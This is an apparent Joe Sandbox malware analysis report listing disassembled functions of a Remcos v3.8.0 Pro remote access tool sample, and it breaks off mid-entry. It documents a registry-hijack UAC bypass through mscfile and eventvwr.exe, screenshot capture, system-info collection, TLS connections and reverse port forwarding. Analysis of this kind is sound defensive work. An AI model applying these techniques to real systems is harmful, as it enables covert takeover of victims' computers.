Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
ExitProcess.KERNEL32 ref: 00406782

Strings

C:\Users\user\Desktop\DB5rQYsfd6.exe, xrefs: 00406730
mscfile\shell\open\command, xrefs: 004066D4
@8T, xrefs: 004066E8
origmsc, xrefs: 00406710
Software\Classes\mscfile\shell\open\command, xrefs: 0040673F
open, xrefs: 0040676E
eventvwr.exe, xrefs: 0040674F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: @8T$C:\Users\user\Desktop\DB5rQYsfd6.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-3672440147
Opcode ID: f708368e7f3f46e5b25359c10fa8ec572cdcbdb9988c5ff18000a1be1354ba9a
Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
Opcode Fuzzy Hash: f708368e7f3f46e5b25359c10fa8ec572cdcbdb9988c5ff18000a1be1354ba9a
Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE

Function 0041AA4F Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00000001), ref: 0041AA5D
GetConsoleWindow.KERNEL32 ref: 0041AA63
ShowWindow.USER32(00000000,00000000), ref: 0041AA76

Strings

* BreakingSecurity.net, xrefs: 0041AAD0
CONOUT$, xrefs: 0041AA89
--------------------------, xrefs: 0041AADE
3.8.0 Pro, xrefs: 0041AAC2
* Remcos v, xrefs: 0041AAB4
--------------------------, xrefs: 0041AAA6

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ConsoleWindow$AllocShow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
API String ID: 3461962499-4025029772
Opcode ID: bb5842c9276b924b84f2b7f99c8538917f0848a2b2f901183b5b0da883229c56
Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
Opcode Fuzzy Hash: bb5842c9276b924b84f2b7f99c8538917f0848a2b2f901183b5b0da883229c56
Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D

Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 01d7c80d3e8cbe2ee9ce9df63989760f3c3320e1a6c13e210a8b5135b2194479
Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
Opcode Fuzzy Hash: 01d7c80d3e8cbe2ee9ce9df63989760f3c3320e1a6c13e210a8b5135b2194479
Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5

Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445645

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00445651
_free.LIBCMT ref: 0044565C
_free.LIBCMT ref: 00445667
_free.LIBCMT ref: 00445672
_free.LIBCMT ref: 0044567D
_free.LIBCMT ref: 00445688
_free.LIBCMT ref: 00445693
_free.LIBCMT ref: 0044569E
_free.LIBCMT ref: 004456AC

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88

Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00417F6F
GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
Sleep.KERNEL32(000003E8), ref: 004180B3
GetLocalTime.KERNEL32(?), ref: 004180BB
Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 00418055
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00418050, 00418071, 004180DF

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-3790400642
Opcode ID: 06a38dffe589ece9c94c7312818e614725db3db3adc6128aa6907061a3018930
Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
Opcode Fuzzy Hash: 06a38dffe589ece9c94c7312818e614725db3db3adc6128aa6907061a3018930
Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799

Function 004048A8 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0

Strings

Connection Failed: , xrefs: 00404A23
TLS Handshake... | , xrefs: 004048E4
TLS Authentication Failed, xrefs: 00404979
TLS Error 1, xrefs: 00404917
TLS Error 2, xrefs: 00404935
TLS Error 3, xrefs: 004049B8
Connection Refused, xrefs: 00404A56

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CreateEventLocalTime
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 2082726707-2151626615
Opcode ID: f585475f6b8ab2e405adadd23c5203a1a4cbbe8530a351afb4dab49d1aabd258
Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
Opcode Fuzzy Hash: f585475f6b8ab2e405adadd23c5203a1a4cbbe8530a351afb4dab49d1aabd258
Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228

Sleep.KERNEL32(00000064), ref: 00415A46
DeleteFileW.KERNEL32(00000000), ref: 00415A7A

Strings

\sysinfo.txt, xrefs: 004159C5
dxdiag, xrefs: 00415A0F
/t , xrefs: 004159F9
temp, xrefs: 004159CA
open, xrefs: 00415A14

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 588032217042f102b569d258d12ef4b9a752e172f960098ad591eb97a38a28d9
Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
Opcode Fuzzy Hash: 588032217042f102b569d258d12ef4b9a752e172f960098ad591eb97a38a28d9
Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99

Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B

Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
TranslateMessage.USER32(?), ref: 0041B29E
DispatchMessageA.USER32(?), ref: 0041B2A8
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5

Strings

Remcos, xrefs: 0041B26D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68

Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B

Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 0045100F
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00451092
__alloca_probe_16.LIBCMT ref: 004510CA
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451125
__alloca_probe_16.LIBCMT ref: 00451174
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0045113C

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004511B8
__freea.LIBCMT ref: 004511E3
__freea.LIBCMT ref: 004511EF

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
Opcode Fuzzy Hash: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768

Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

_memcmp.LIBVCRUNTIME ref: 00442935
_free.LIBCMT ref: 004429A6
_free.LIBCMT ref: 004429BF
_free.LIBCMT ref: 004429F1
_free.LIBCMT ref: 004429FA
_free.LIBCMT ref: 00442A06

Strings

C, xrefs: 004427F3

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
Opcode Fuzzy Hash: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44

Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

tcp, xrefs: 004134C9
udp, xrefs: 0041349C

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A

Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040FF79
inet_ntoa.WS2_32(?), ref: 00410014

Strings

GetDirectListeningPort, xrefs: 00410117
StartForward, xrefs: 004100D8
StopForward, xrefs: 004100F5
StartReverse, xrefs: 004100E4
StopReverse, xrefs: 00410106

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 8c5701e6cc9f7fb126a1b4df8ec95793ff9840fd8e0c3355c2e69ecdaa70aa10
Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
Opcode Fuzzy Hash: 8c5701e6cc9f7fb126a1b4df8ec95793ff9840fd8e0c3355c2e69ecdaa70aa10
Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF

Function 0040971E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00409738

Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
GetFileAttributesW.KERNEL32(00000000), ref: 00409785
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F

Strings

@8T, xrefs: 004097EF, 004097FA

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: @8T
API String ID: 3795512280-4097998276
Opcode ID: e5d4529cbef31fa4238917c745ea136b108e3ac5cd2eee8885055f6e3b382454
Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
Opcode Fuzzy Hash: e5d4529cbef31fa4238917c745ea136b108e3ac5cd2eee8885055f6e3b382454
Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A

Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36

Strings

.part, xrefs: 00406A1A

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWrite
String ID: .part
API String ID: 1511717022-3499674018
Opcode ID: 2ab30280b9316990576d501d0fae2c6b614aff3488e0ee63556874e7d9b7435f
Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
Opcode Fuzzy Hash: 2ab30280b9316990576d501d0fae2c6b614aff3488e0ee63556874e7d9b7435f
Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A

Function 0040AE2A Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

